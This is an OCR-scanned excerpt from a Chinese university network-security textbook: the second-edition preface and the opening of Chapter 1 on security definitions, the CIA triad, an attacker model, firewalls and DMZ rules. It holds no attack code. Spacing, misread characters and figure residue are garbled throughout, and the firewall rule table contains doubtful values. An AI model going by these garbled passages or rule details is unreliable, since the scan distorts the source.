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第 2 版 前 言 


本 书 第 1 版 出 版 至 今 的 5 年 多 时 间 里 ,网 络 安 全 上 升 为 国家 安全 的 战略 高 度 ,《 网 络 安 
全 法 ) 正 式 实施 ,网 络 安 全 一 级 学 科 正 式 设置 并 确定 为 新 工科 专业 。 这 些 重大 举措 推动 
了 高 校 信息 安全 专业 建设 ,促进 了 网 络 安全 教学 内 容 和 方法 的 改革 ,迫切 需要 更 新 教学 
内 容 ; 另 一 方面 ,在 教学 实践 中 广大 师 生 提出 了 很 多 中 肯 的 建议 ,促使 我 们 对 教材 相关 
章节 的 安排 及 内 容 取舍 有 了 新 的 认识 ,也 希望 通过 新 版 教材 得 以 体现 。 

第 2 版 继承 了 第 1 版 的 优点 ,体现 精 讲 多 练 、 教 为 主导 、 学 为 主体 的 原则 ,由 浅 入 
深 、 循 序 渐进 地 介绍 网 络 安全 基本 原理 、 基 本 方法 .基本 技能 ,注重 学 生理 论 水 平和 实践 
技能 的 同步 提高 。 既 有 严密 、 抽 象 的 密码 学 原理 讲解 ,也 有 具体 .直观 的 网 络 安全 设备 
(防火 墙 \VPN IPS) 配 置 操 作 、 图 像 数字 水 印 编程 实现 等 实践 内 容 , 能 够 很 好 地 满足 网 
络 安全 课程 理论 教学 和 实践 教学 的 需求 。 

网 络 安全 教学 的 发 展 趋势 是 培养 攻防 兼备 的 人 才 ,新 工科 教育 要 求教 学 更 加 强调 
工程 实践 能 力 和 创新 能 力 的 培养 ,因此 本 书 第 2 版 新 增 了 基于 IP 地 址 和 端口 的 防火 墙 
安全 策略 配置 ,VPN 单 臂 旁 挂 于 防火 墙 配置 .Zenamp 网 络 安全 扫描 、 冰 河 木马 攻击 与 
防范 、DES 算法 和 RSA 算法 性 能 测试 .凯撒 密码 解密 进 阶 ` 图 像 数 字 水 印 .基于 同 态 加 
密 的 图 像 编辑 8 个 实验 教学 内 容 , 助 力 师 生 主 动 、 积 极 开 展 实验 教学 ,提倡 自主 创新 拓 
展 实验 内 容 。 

第 2 版 将 第 1 版 的 13 章 精简 为 9 章 , 删 除了 第 1 版 的 第 2 章 、 第 9 章 、 第 10 章 ,第 
11 章 。 具 体 修 订 内 容 如 下 : 

第 1 章 网 络 安全 概论 ,按照 2015 年 教育 部 “网 络 安全 一 级 学 科 论证 工作 组 ”制定 的 
知识 体系 重 写 了 本 章 , 新 增 ( 网 络 安 全 法 ) 解 读 和 P2DR2 网 络 安全 模型 。 

第 2 章 密 码 学 基础 ,新 增 椭圆 曲线 密码 、 国 产 密码 、 网 络 银行 安全 支付 相关 章节 ,对 
密码 算法 增加 了 例题 讲解 。 

第 3 章 网 络 攻防 技术 ,由 第 1 版 的 第 3 章 、 第 4 章 、 第 5 章 内 容 合 并 而 成 。 

第 4 章 防 火 墙 与 人 侵 防 御 , 新 增 防 火 墙 人 侵 防 御 、 内 容 过 滤 等 网 络 安 全 配置 实例 介 
绍 ,培养 学 生 配 置 网 络 安 全 设备 ,保证 网 络 安全 运行 的 实践 能 力 。 

第 5 章 IP 安 全 与 Web 安全 ,新 增 SQL 注入 攻击 、VPN 安全 性 配置 相关 章节 ,在 
网 络 攻防 对 抗 中 应 用 所 学 理论 知识 保证 网 络 安全 。 

第 6 章 网 络 安全 方案 设计 与 评估 、 第 7 章 计算 机 病毒 与 特洛伊 木马 未 做 内 容 修改 。 

第 8 章 数字 版 权 保护 ,新 增 章 节 , 应 用 数字 水 印 原 理 实现 数字 图 像 数据 库 版 权 保 
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护 , 应 用 抗 合谋 数字 指纹 ECFF 实现 数字 资源 版 权 溯源 追踪 ,为 打击 数字 资源 盗版 提供 

技术 支持 。 

第 9 章 隐 私 保护 ,新 增 章 节 , 介 绍 隐私 保护 及 其 度量 方法 ; 根据 数据 生命 周期 隐私 保护 
模型 具体 讲解 数据 发 布 . 数 据 存储 ,数据 挖掘 数据 应 用 4 个 阶段 使 用 的 隐私 保护 技术 ; 应 
用 同 态 加 密 解 密 技 术 实 现 密 文 图 像 编 辑 . 保 证 云 计 算 环 境 下 用 户 数据 的 安全 性 。 

本 书 第 4 章 至 第 7 章 由 王 铁 君 编写 ,其 余 章 节 由 李 启 南 编写 ,并 进行 统 稿 。 

兰州 交通 大 学 电子 与 信息 工程 学 院 吴 展 文 教授 对 本 书 进行 了 总 体 规划 与 设计 ,提出 了 
再 版 方案 ,对 内 容 的 安排 及 实验 与 习题 等 方面 给 出 了 有 具体 的 指导 建议 ,在 此 表示 由 衷 的 

清华 大 学 出 版 社 郑 实 世 编辑 认真 、 仔 细 地 多 次 阅读 了 本 书 初稿 ,详细 指出 了 存在 的 诸多 
错误 之 处 ,为 本 书 顺利 出 版 付出 了 巨大 心血 ,在 此 表示 衷心 的 感谢 ! 

本 书 得 到 兰州 交通 大 学 实验 教学 改革 项 目 (项 目 号 : 2018016) 资 助 。 

本 书 参考 理论 学 时 为 32 学 时 ,实验 学 时 为 16 学 时 ; 或 者 理论 学 时 为 24 学 时 ,讲授 前 6 
章 后 选择 第 7 章 、 第 8 章 、 第 9 章 中 的 一 章 讲授 ; 实验 学 时 为 8 学 时 ,任意 选 做 4 个 实验 。 

作为 教学 交流 ,我 们 整理 了 PPT 课件 以 及 习题 的 参考 答案 ,请 各 位 教师 在 清华 大 学 出 
版 社 网 站 (http://www. tup. com. cn) 免 费 下 载 参 考 。 

由 于 作者 水 平 有 限 , 书 中 难免 会 有 不 当 之 处 , 敬 请 读者 提出 宝贵 意见 。 
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第 1 章 网 络 安全 概论 


本 章 学 习 要 求 

。 掌握 网 络 安全 定义 、 网 络 安全 目标 、 网 络 安全 教学 内 容 ; 

4 掌握 没有 网 络 安全 就 没有 国家 安全 的 观点 ,认识 网 络 安全 的 重要 性 ; 
。 掌握 DMZ 和 个 人 隐私 概念 、 常 见 的 五 类 网 络 安全 设备 功能 ; 

。 掌握 P2DR2 网 络 安全 动态 模型 、 网 络 安全 评价 标准 ; 

。 掌握 正确 的 网 络 安全 观 《 网 络 安全 法 》 的 主要 内 容 。 


1.1 网 络 安全 定义 


在 信息 革命 的 演进 过 程 中 ,传统 互联 网 、 移 动 互联 网 、 物 联网 快速 发 展 起 来 ,成 为 继 陆 、 
海 、 空 ,天 之 后 的 第 五 大 空间 , 称 之 为 网 络 空间 (Cyberspace) 。 

网 络 空间 是 通过 全 球 互联 网 和 计算 系统 进行 通信 ,控制 和 信息 共享 的 动态 虚拟 空间 ,在 
信息 时 代 是 社会 有 机 和 运行 的 指挥 系统 。 在 网 络 空间 里 不 仅 包括 通过 网 络 互 联 而 成 的 各 种 计 
算 系 统 (包括 各 种 智能 终端 ) .连接 端 系统 的 网 络 .连接 网 络 的 互联 网 和 受 控 系 统 , 也 包括 其 
中 的 硬件 ,软件 乃至 产生 、 处 理 \ 传 输 、 存 储 的 各 种 数据 或 信息 。 与 其 他 空间 不 同 的 特点 是 ， 
网 络 空间 没有 明确 的 、 固 定 的 边界 ,也 没有 和 集中 的 控制 权威 。 

在 网 络 空间 里 ,信息 安全 问题 的 内 涵 和 外 延 也 在 不 断 放 大 ,最 终 扩大 到 了 整个 网 络 空 
间 。 从 此 ,信息 安全 的 概念 被 网 络 安全 所 涵盖 。 

网 络 信息 泄露 关乎 成 千 上 万 人 的 敏感 信息 和 个 人 隐私 ,网 络 攻击 和 黑色 产业 威胁 经 济 
健康 发 展 ,网 络 和 与 论 恶意 炒作 影响 社会 稳定 ,网 络 战争 和 网 络 间谍 威胁 国家 安全 。 同 时 ,由 
于 网 络 核心 技术 ,优势 技术 掌握 在 少数 国家 手 里 ,网 络 安全 问题 极 易 被 他 人 恶意 传播 、 利 用 、 
控制 和 绑架 ,成 为 攻击 .颠覆 他 国政 权 的 手段 .途径 ,网 络 安全 已 成 为 全 世界 关注 的 焦点 和 热 
点 问题 。 

1. 网 络 安全 定义 

网 络 安 全 是 指 网 络 系统 的 硬件 ,软件 及 其 系统 中 的 数据 受到 保护 ,不 受 偶然 的 或 者 恶意 
的 原因 而 遭 到 破坏 、 更 改 ,泄露 ,系统 连续 可 靠 正常 地 运行 ,网 络 能 够 提供 不 中 断 服务 。 

网 络 安全 的 具体 含义 因 观 察 角 度 的 不 同 而 不 同 : 

(1) 从 用 户 ( 个 人 .企业 等 ) 的 角度 来 说 ,他 们 希望 涉及 个 人 隐私 或 商业 利益 的 信息 在 网 
络 上 传输 时 受到 机 密 性 、 完 整 性 和 真实 性 方面 的 保护 ,避免 其 他 人 或 对 手 利用 窃听 、 骨 充 、 臭 
改 ,抵赖 等 手段 侵犯 用 户 的 利益 和 隐私 。 

(2) 从 网 络 运行 管理 者 角度 说 ,他 们 希望 对 本 地 网 络 信息 的 访问 、 读 写 等 操作 受到 保护 
和 控制 ,避免 出 现 * 陷 门 ”病毒 .非法 存 取 、 拒 绝 服务 .网络 资 源 非法 占用 和 非法 控制 等 威胁 ， 
制止 和 防御 网 络 黑客 的 攻击 。 
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(3) 对 安全 保密 部 门 来 说 ,他 们 希望 对 非法 的 有害 的 或 涉及 国家 机 密 的 信息 进行 过 滤 
和 防 堵 , 避 免 机 要 信息 泄露 ,避免 对 社会 产生 危害 ,对 国家 造成 巨大 损失 。 

(4) 从 社会 教育 和 意识 形态 角度 来 讲 , 网 络 上 不 健康 的 内 容 会 对 社会 的 稳定 和 人 类 的 
发 展 造成 阻碍 ,必须 对 其 进行 控制 。 

因此 我 们 认为 网 络 安全 既 要 保证 构成 网 络 系统 的 软件 、 硬 件 资 源 具 有 可 用 性 (网 络 运行 
安全 ) ,也 要 保护 网 络 系统 存储 、 使 用 的 信息 具有 机 密 性 、 完 整 性 .可 用 性 真实 性 和 可 控 性 
(网 络 信息 安全 ) ,是 网 络 信息 安全 和 网 络 运行 安全 的 有 机 结合 ,网络 运行 安全 是 网 络 信息 安 
全 的 前 提 和 基础 ,网 络 信息 安全 是 网 络 运行 安全 的 具体 表现 和 目的 。 

理解 网 络 安全 的 关键 是 必须 认识 到 现实 网 络 中 存在 各 种 各 样 的 敌手 (攻击 者 ) ,他 们 通 
过 多 种 技术 手段 或 者 破坏 网 络 设 施 ,阻止 网 络 运 行 安全 ,危害 国家 安全 ; 或 者 非法 获取 网 络 
信息 ,追求 个 人 利益 最 大 化 ,损害 全 社会 的 网 络 信 息 安 全 。 

网 络 安全 的 内 涵 和 外 延 是 与 时 俱 进 的 。 在 计算 机 网 络 产生 之 前 ,网 络 安全 主要 是 指 通 
信安 全 ,重点 关注 的 是 信息 加 密 ( 信 息 的 保密 性 )。 计 算 机 网 络 产生 后 ,网 络 安全 中 的 网 络 主 
要 是 指 计 算 机 网 络 , 网 络 安全 是 指 保护 计算 机 网 络 不 因 偶然 或 恶意 因素 的 影响 而 遭 到 破坏 、 
更 改 .泄露 ,系统 连续 可靠. 正常 地 运行 ,网 络 服务 不 中 断 。 

随 着 “三 网 融合 ”的 发 展 ,网 络 安全 领域 也 从 计算 机 网 络 延 伸 到 物 联网 和 有 线 电视 网 络 。 
近 几 年 来 ,网 络 安全 进一步 向 物理 世界 和 虚拟 世界 延伸 ,包括 与 国家 基础 设施 密切 相关 的 工 
业 控 制 网 络 或 系统 (如 电力 网 络 .交通 控制 网 络 ,城市 供水 网 络 .石油 天 然 气 网 络 和 核电 控制 
系统 等 ) 虚拟 的 社交 网 络 等 ,网 络 安 全 上 升 到 了 网 络 空间 安全 。 

网 络 空间 安全 (Cyberspace Security ,简称 Cyber Security) 研 究 网 络 空间 中 的 安全 威胁 
和 防护 问题 , 即 在 有 敌手 (adversary) 的 对 抗 环 境 下 ,研究 信息 在 产生 、 传 输 、 存 储 、 处 理 的 各 
个 环节 中 所 面临 的 威胁 和 防御 措施 以 及 网 络 和 系统 本 身 的 威胁 和 防护 机 制 。 

网 络 空间 安全 不 仅仅 包括 传统 信息 安全 所 研究 的 信息 的 保密 性 、 完 整 性 和 可 用 性 ,同时 
还 包括 构成 网 络 空间 基础 设施 的 安全 和 可 信 。 

这 里 ,进一步 明确 一 下 信息 安全 网络 安 全 、 网 络 空间 安全 概念 之 异同 ,三 者 均 属 于 非 传 
统 安全 , 均 聚 焦 于 信息 安全 问题 。 信 息 安 全 使 用 范围 比较 广 ,可 以 指 线 下 和 线 上 的 信息 安 
全 , 既 可 以 指 传统 的 信息 系统 安全 ,也 可 以 指 网 络 安全 或 网 络 空间 安全 ,但 无 法 完全 替代 网 
络 安全 与 网 络 空间 安全 的 内 涵 ; 网 络 安全 、 网 络 空间 安全 的 核心 都 是 信息 安全 问题 ,只 是 出 
发 点 和 侧重 点 有 所 区 别 。 网 络 安全 可 以 指 信息 安 全 或 网 络 空间 安全 ,但 侧重 点 是 线 上 安全 
和 网 络 社会 安全 ; 网 络 空间 安全 可 以 指 信息 安全 或 网 络 空间 安全 ,但 侧重 点 是 与 陆 \ 海 、 空 、 
太空 并 列 的 空间 概念 。 

网 络 安全 、 网 络 空间 安全 ,信息 安全 三 者 相 比 较 , 前 两 者 反映 的 信息 安全 更 立体 、 更 宽 
域 ,有 更 多 层次 ,也 更 多 样 ,更 能 体现 网 络 和 空间 的 特征 ,并 与 其 他 安全 领域 有 更 多 的 渗透 与 
融合 。 

总 之 ,不 同名 称 的 内 涵 和 外 延 是 不 同 的 ,侧重 点 也 不 同 。 我 们 既 要 看 到 不 同名 称 间 的 差 
异 , 在 不 同 场合 使 用 不 同名 称 ; 也 应 该 看 到 其 核心 内 容 是 相同 的 ,关注 共同 内 容 的 学 习 。 

2. 网 络 安全 教学 内 容 

教育 部 “网 络 安全 一 级 学 科 论 证 工作 组 ?提出 的 教学 内 容 包 括 网 络 空间 安全 基础 理论 、 
密码 学 基础 知识 、 系 统 安 全 理论 与 技术 、 网 络 安全 理论 与 技术 、 应 用 安全 技术 知识 5 个 部 分 ， 
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如 图 1-1 所 示 。 























































































































































































































隐私 保护 工程 系统 与 物 联网 安全 立 圾 信息 识别 与 过 滤 与 情 分 析 放 密码 分 析 
技术 = 
数据 存储 备份 与 恢复 数字 版 权 保护 取证 与 追踪 知识 密码 协议 
可 证 明 安 全 
密码 体制 
分 布 式 系统 安全 | | 软件 安全 网 络 安全 管理 网 了 | 客 
可 J 络 量子 密 硬 码 
系统 安 || 二 网 络 安 
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电子 与 电路 || 复杂 加 络 理论 | 博 认 理论 | | 网络 安全 导论 | | 网络 空间 安全 管 | 。 后 | | | 本 可 上 线 
是 和 理 与 法 律 法 规 sa 
es Ry 算法 与 计算 基础 计算 代数 
数论 | 图 论 信息 论 控制 论 大 数据 分 析 方 法 | 复杂 性 理论 


















































图 1-1 网 络 安全 教学 内 容 


(1) 网 络 空间 安全 基础 理论 是 支撑 整个 学 科 的 基础 ,为 其 他 方向 的 研究 提供 理论 .架构 
和 方法 学 指导 。 

(2) 密码 学 基础 主要 研究 在 有 敌手 的 环境 下 ,如 何 实现 计算 .通信 和 网 络 的 信息 编码 和 
分 析 ,为 网 络 .系统 及 应 用 安全 提供 密码 机 制 。 

(3) 系统 安全 理论 与 技术 主要 研究 网 络 环境 下 计算 单元 ( 端 系统 ) 的 安全 ,是 网 络 空间 
安全 的 基础 单元 。 

(4) 网 络 安全 理论 与 技术 保证 连接 计算 机 的 中 间 网 络 自身 的 安全 以 及 在 网 络 上 所 传输 
的 信息 的 安全 。 

(5) 应 用 安全 技术 是 指 网 络 空间 中 建立 在 因特网 之 上 的 应 用 和 服务 系统 ,如 国家 重要 
行业 应 用 .社交 网 络 等 。 应 用 安全 研究 各 种 安全 机 制 在 一 个 复杂 系统 中 的 综合 应 用 ,保证 网 
络 空间 中 大 型 应 用 系统 的 安全 ,也 是 安全 机 制 在 互联 网 应 用 或 服务 领域 中 的 综合 应 用 。 

本 书 第 2 章 讲 解密 码 学 基础 知识 ,第 3 章 一 第 6 章 讲解 网 络 安全 理论 与 技术 ,第 7 章 讲 
解 系统 安全 理论 与 技术 ,第 8 章 、 第 9 章 分 别 讲解 应 用 安全 技术 中 的 数字 版 权 保护 、 隐 私 
保护 。 


1.1.1 网 络 信息 安全 


网 络 信息 安全 是 对 信息 保密 性 、 完 整 性 、 可 用 性 的 保护 ,具体 指 在 有 敌手 的 对 抗 环 境 下 ， 
研究 信息 在 产生 传输 、 存 储 、 处 理 各 个 环节 中 所 面临 的 威胁 和 防御 措施 。 

机 密 性 .完整 性 .可 用 性 (Confidentiality，Integrity，Availability,CIA) 称 为 信息 安全 的 
三 要 素 。 

机 密 性 : 通过 各 种 加 密 技 术 ,保证 信息 不 泄露 给 非 授权 用 户 、 实 体 或 过 程 或 被 其 利用 的 
特性 。 目 的 是 防止 对 信息 进行 未 授权 的 “ 读 ”。 

完整 性 : 保证 信息 未 经 授权 不 能 进行 改变 的 特性 。 即 信息 在 存储 或 传输 过 程 中 保持 不 
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被 修改 、 不 被 破坏 和 丢失 的 特性 ,保证 接收 到 的 信息 和 发 出 的 信息 是 相同 的 。 目 的 是 防止 或 
至 少 是 检测 出 未 授权 的 “ 写 ”( 对 数据 的 改变 ) 。 

可 用 性 : 可 被 授权 实体 访问 并 按 需 求 使 用 的 特性 。 即 当 需 要 时 保证 合法 用 户 对 信息 或 
资源 的 使 用 不 会 受到 影响 或 被 不 正当 地 拒绝 。 例 如 网 络 环境 下 拒绝 服务 (DoS) 破坏 网 络 
和 有 关系 统 的 正常 运行 等 都 属于 对 可 用 性 的 攻击 。 

理想 状态 下 ,网 络 系统 抽象 为 如 图 1-2 所 示 的 AB 模型 ,Alice 和 Bob 相互 通信 。 本 书 
约定 Alice 是 网 上 银行 Bank 的 合法 客户 。 如 何 保证 网 上 银行 支付 安全 是 网 络 安全 应 用 的 
范例 ,也 是 本 书 学 习 的 重点 。 


齐 Hi, Lam Alice.l take 100 yuan. 全 
OK! 


Alice Bank 





图 1-2 AB 模型 


由 于 信息 在 一 个 开放 的 网 络 (大 气 、 通 信和 网 络 、 计 算 机 网 络 , 物 联网 ) 中 传输 ,通过 网 络 获 
取信 息 是 简单 可 行 的 ,通信 具有 公开 性 ,所 以 真实 的 通信 系统 中 是 存在 敌手 (攻击 者 ) 的 。 有 
敌手 的 AB 系统 如 图 1-3 所 示 ,攻击 者 Trudy 可 以 侦 听 、 截 取 通信 信息 , 读 懂 通 信 内 容 ( 被 动 
攻击 ), 也 可 以 删除 、 增 加 报 文 、 重 放 报 文 、 自 改 报 文 (主动 攻击 )。 例 如 Trudy 可 以 算 改 交易 
金额 ,可 以 在 Alice 关机 后 重 放 通 信和 内容。 


J Hi am Alicel take 1000 yuan 
Alice ~ pa Bank 
重 放 ， 


Hi,l am Alice. 
和 二 Ttake 100 yuan. 






























































Trudy 
图 1-3 有 敌手 的 AB 模型 


对 图 1-3 而 言 ,信息 的 机 密 性 表现 为 Alice 不 想 让 Trudy 知道 她 存款 账户 有 多 少 钱 ; 完 
整 性 表现 为 Bank 需要 防止 Trudy 擅自 增加 自己 账户 的 余额 ,或 者 改变 Alice 账户 里 的 
余额 。 

机 密 性 和 完整 性 不 是 同一 个 概念 。 在 图 1-4 中 ,Trudy 不 能 读 懂 通 信 的 内 容 ( 机 密 性 )， 
但 可 以 修改 这 些 不 可 读 的 数据 (破坏 完整 性 ) 。 





AF8E70068E29D051 Kl,L dp 


外 Dolfh.L wdnh 1000 bxdq. 
EN 二 
Alice AN es Bank 


i 
CE 而 What is this? 


Trudy 


图 1-4 加 密 AB 模型 
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此 外 ,Trudy 对 Bank 发 动 DoS 攻击 ,会 导致 Alice 无 法 获得 服务 , 转 而 从 其 他 银行 获得 
服务 ,从 而 破坏 Bank 的 可 用 性 。 

显然 ,Trudy 通过 延 时 重 放 就 可 假冒 Alice, Bank 如 何 知 道 这 个 登录 的 “Alice” 是 真实 的 
Alice, 而 不 是 Trudy 假冒 的 ? 这 是 身份 认证 需要 解决 的 问题 。 

有 敌手 的 对 抗 环境 , 我 们 需要 解决 以 下 问题 : 

(1) 如 何 防 止 Trudy 窃听 信息 ?使 用 信息 加 密 技 术 解 决 。 

(2) 信息 在 传输 中 有 没有 改变 ? 使 用 数据 摘要 技术 解决 。 

(3) Alice is Alice? Bank 如 何 确认 Alice 不 是 Trudy 假冒 的 ? 使 用 身份 认证 技术 
解决 。 

(4) 如 何 防 止 重 放 ? 使 用 时 间 戳 技术 解决 。 


1.1.2 网 络 运 行 安全 


网 络 运行 安全 是 指 网 络 系统 的 硬件 软件 不 因 偶 然 的 或 者 恶意 的 原因 而 遭受 到 破坏 、 更 
改 , 系 统 连续 可 靠 正 常 地 运行 ,网 络 服务 不 中 断 。 

Internet 的 开放 性 使 得 我 们 不 可 能 保证 整个 Internet 的 安全 性 ,因此 需要 将 网 络 划 分 
为 安全 区 (Trust) ,不 安全 区 (Untrust) 隔离 区 (DeMilitarized Zone,DMZ)3 个 不 同等 级 的 
安全 区 域 。 

通常 使 用 防火 墙 (Firewall) 将 网 络 划 分 为 安全 区 和 不 安全 区 两 个 区 域 ,如 图 1-5 所 示 ， 
安全 区 也 称 内 网 ,多 为 局 域 网 或 Intranet; 不 安全 区 特 指 Internet。 


一 
数据 流 




















PCi6 
192.168.0.16 


PC 
192.168.0.1 
















图 1-5 网 络 安全 设备 应 用 示意 图 


防火 墙 是 由 计算 机 软件 ,硬件 设备 组 合 而 成 ,在 一 个 安全 区 和 不 安全 区 之 间 执 行 访问 控 
制 策 略 的 一 个 或 一 组 系统 。 个 人 计算 机 使 用 软件 防火 墙 ,但 为 了 满足 网 络 实时 通信 的 要 求 ， 
网 络 都 使 用 硬件 防火 墙 , 可 以 理解 为 是 一 个 专门 执行 访问 策略 的 专用 计算 机 。 

硬件 防火 墙 通常 具有 多 个 端口 分 别 连接 多 个 不 同 网 络 ,如 图 1-5 中 防火 墙 具有 3 个 端 
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口 。 不 同 网 络 的 数据 包 流 入 防火 墙 后 ,防火 墙根 据 网 络 管理 员 设 定 的 过 滤 规 则 对 流 经 的 每 
个 数据 包 分 析 包头 ,判断 其 是 否 匹配 过 滤 规 则 ,匹配 则 放行 ,否则 丢弃 该 数据 包 。 过 滤 规 则 
示例 见 表 1-1。 

表 1-1 防火 墙 过 滤 规 则 








规则 序号 包 的 方向 源 地 址 目的 地 址 处 理 方 法 
1 出 192. 168. 1. 1/8 61. 135. 169. 121 运行 通过 
2 入 61. 135. 169. 121 192. 168. 1.1/8 拒绝 通过 














防火 墙 默认 情况 下 设置 为 阻止 外 网 对 内 网 进行 访问 ,例如 为 图 1-5 中 的 防火 墙 设置 
表 1-1 的 过 滤 规 则 后 ,位 于 外 网 的 百度 服务 器 (IP 地 址 为 61. 135. 169. 121) 就 不 能 向 内 网 发 
送信 息 ( 访 问 内 网 ) ,但 内 网 用 户 (IP 地 址 为 192. 168. 1. 1/8) 仍 然 能 访问 百度 服务 器 。 

如 果 我 们 把 服务 器 放 在 内 网 就 会 导致 外 网 无 法 访问 该 服务 器 ,所 以 需要 定义 出 一 个 
DMZ 区 域 : Trust 和 Untrust 都 可 以 访问 DMZ 区 域 ,该 区 域 既 不 是 绝对 的 安全 ,也 不 是 绝 
对 的 不 安全 ,这 就 是 设计 DMZ 区 域 的 核心 思想 。 

一 个 划分 有 DMZ 的 网 络 必须 遵守 6 条 访问 控制 策略 ,明确 各 个 网 络 之 间 的 访问 关系 。 

(1) 内 网 可 以 访问 外 网 。 

(2) 内 网 可 以 访问 DMZ。 

(3) 外 网 不 能 访问 内 网 。 

(4) 外 网 可 以 访问 DMZ。 

(5) DMZ 不 能 访问 内 网 。 

(6) DMZ 不 能 访问 外 网 。 

DMZ 是 为 了 解决 安装 防火 墙 后 外 部 网 络 (Untrust) 不 能 访问 内 部 网 络 (Trust) 服 务 器 
的 问题 而 设立 在 非 安全 区 与 安全 区 之 间 的 一 个 缓冲 区 ,这 个 缓冲 区 位 于 内 部 网 络 和 外 部 网 
络 之 间 的 小 网 络 区 域内 ,在 这 个 小 网 络 区 域内 可 以 放置 一 些 必须 公开 的 服务 器 设施 ,如 企业 
Web 服务 器 FTP 服务 器 和 论坛 等 。 另 一 方面 ,通过 这 样 一 个 DMZ 区 域 ,更 加 有 效 地 保 
护 了 内 部 网 络 , 因 为 这 种 网 络 部 署 , 比 起 一 般 的 防火 墙 方案 ,对 攻击 者 来 说 又 多 了 一 道 
关卡 。 

第 一 代 网 络 运行 安全 技术 ,以 保护 为 目的 ,划分 明确 的 网 络 边界 ,利用 各 种 保护 和 隔离 
手段 ,如 用 户 鉴 别 和 授权 ,访问 和 控制 .多 级 安全 、 权 限 管 理 和 信息 加 解密 等 ,试图 在 网 络 边 
界 上 阻止 非法 入 侵 ,从 而 达到 确保 信息 安全 的 目的 。 这 些 技术 解决 了 许多 安全 问题 ,但 并 不 
是 在 所 有 情况 下 都 能 清楚 地 划分 并 控制 边界 ,保护 措施 也 并 不 是 在 所 有 情况 下 都 有 效 。 因 
此 ,第 一 代 网 络 运行 安全 技术 并 不 能 全 面 保护 网 络 运行 安全 ,于 是 出 现 了 第 二 代 网 络 运行 安 
全 技术 。 

第 二 代 网 络 运行 安全 技术 ,以 保障 为 目的 ,以 检测 技术 为 核心 ,以 恢复 技术 为 后 盾 ,融合 
了 保护 、 检 测 、 响 应 和 恢复 4 大 类 技术 ,使 用 如 图 1-5 所 示 的 防火 墙 (Firewall)、 和 人 侵 检 测 系 
统 (Intrusion Protect System,IPS) .虚拟 专用 网 (Virtual Private Network, VPN) 等 常用 网 
络 安全 设备 实现 ,它们 的 功能 如 表 1-2 所 示 。 

第 二 代 网 络 运行 安全 技术 也 称 为 信息 保障 技术 ,目前 已 经 得 到 了 广泛 应 用 。 信 息 保障 
技术 的 基本 假设 是 : 如 果 挡 不 住 敌人 ,至 少 要 能 发 现 敌人 或 敌人 的 破坏 。 例 如 ,能 够 发 现 系 
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统 死机 、 网 络 安全 扫描 ,发 现 网 络 流量 异常 等 。 然 后 针对 发 现 的 安全 威胁 ,采取 相应 的 响应 
措施 ,从 而 保证 系统 的 安全 。 


表 1-2 常见 网 络 安 全 设备 功能 











设备 名 称 设备 功能 
el 防止 来 自 外 网 的 已 知 网 络 攻击 ,保证 内 网 信息 安全 ,构筑 第 一 道 网 络 
安全 防线 
IPS 检测 发 现 未 知 网 络 攻击 并 做 出 实时 反应 ,构筑 第 二 道 网 络 安全 防线 
VPN 保证 外 网 用 户 与 内 网 建立 可 信 的 安全 连接 ,保证 数据 的 传输 安全 





IPSec/SSL VPN Gateway 支持 移动 用 户 与 内 网 建立 可 信 的 安全 连接 ,保证 数据 的 传输 安全 
诱骗 黑客 进行 攻击 ,跟踪 研究 网 络 攻击 技术 发 展 ,进行 网 络 攻 击 法 律 
取证 





Honeypot 








在 信息 保障 技术 中 ,所 有 的 响应 甚至 恢复 都 依赖 于 检测 结论 ,检测 系统 的 性 能 是 信息 保 
障 技术 中 最 为 关键 的 部 分 。 因 此 ,信息 保障 技术 遇 到 的 挑战 是 :检测 系统 能 够 检测 到 全 部 的 
攻击 吗 ? 但 是 几乎 所 有 的 人 都 认为 ,检测 系统 要 发 现 全 部 攻击 是 不 可 能 的 ,准确 区 分 正常 数 
据 和 攻击 数据 是 不 可 能 的 ,准确 区 分 正常 系统 和 有 木马 的 系统 是 不 可 能 的 ,准确 区 分 有 漏洞 
的 系统 和 没有 漏洞 的 系统 也 是 不 可 能 的 。 因 此 出 现 了 第 三 代 网 络 运行 安全 技术 。 

第 三 代 网 络 运行 安全 技术 ,以 顽 存 (Survivable, 也 称 为 可 生存 .生存 ) 为 目的 , 即 系统 在 
遭受 攻击 ,故障 和 意外 事故 的 情况 下 ,在 一 定时 间 内 仍然 具有 继续 执行 全 部 或 关键 使 命 的 能 
力 。 第 三 代 安 全 技术 与 前 两 代 安全 技术 的 最 重要 区 别 在 于 设计 理念 : 不 可 能 完全 正确 地 检测 
和 阻止 对 系统 的 入 侵 行 为 。 第 三 代 安 全 技术 的 核心 是 入侵 容忍 技术 (或 称 攻击 容忍 技术 )。 

容忍 攻击 的 含义 是 在 攻击 者 到 达 系 统 , 甚 至 控制 了 部 分 子 系统 时 ,系统 不 能 丧失 其 应 有 
的 保密 性 、 完 整 性 真实 性 .可 用 性 和 不 可 否认 性 。 增 强 网 络 系统 的 顽 存 性 对 于 在 网 络 战 中 
防御 敌人 的 攻击 具有 重要 意义 。 


1.1.3 网 络 安全 目标 


网 络 安全 的 目标 主要 有 : 

(1) 身份 真实 性 ,通过 各 种 身份 认证 技术 ,确保 通信 实体 的 身份 是 真实 的 。 

(2) 信息 保密 性 ,通过 各 种 加 密 技 术 ,保证 机 密 信息 不 会 泄露 给 非 授权 的 人 或 实体 。 

(3) 数据 完整 性 ,确保 发 送 的 数据 在 发 送 过 程 中 未 被 删 减 增加、 修改 或 破坏 ,从 而 保证 
接收 到 的 数据 和 发 出 的 数据 是 相同 的 。 

(4) 服务 可 用 性 ,保证 合法 用 户 对 信息 或 资源 的 使 用 不 会 受到 影响 或 被 不 正当 的 拒绝 。 

(5) 不 可 否认 性 ,保证 发 送 方 不 能 否认 发 送 过 信息 ,接收 方 也 不 能 否认 接收 过 信息 , 任 
何 用 户 都 不 能 否认 对 信息 或 资源 的 访问 ,通过 建立 有 效 的 确认 机 制 ,防止 实体 否认 其 行为 。 

(6) 系统 可 控 性 ,能 够 监督 和 控制 使 用 资源 的 人 或 实体 对 资源 或 服务 的 使 用 方式 。 

(7) 系统 易 用 性 ,在 满足 安全 性 的 前 提 下 ,系统 的 使 用 操作 应 当 简单 方便 ,维护 容易 。 

(8) 可 审查 性 ,对 出 现 的 网 络 安全 问题 提供 调查 的 依据 和 记录 。 

总 而 言 之 ,网 络 安全 的 目标 就 是 要 保证 合法 的 用 户 在 需要 访问 的 时 候 能 够 访问 到 具有 
访问 权限 的 资源 ; 非法 用 户 和 攻击 者 无 法 访问 和 窃取 受 保护 的 信息 。 

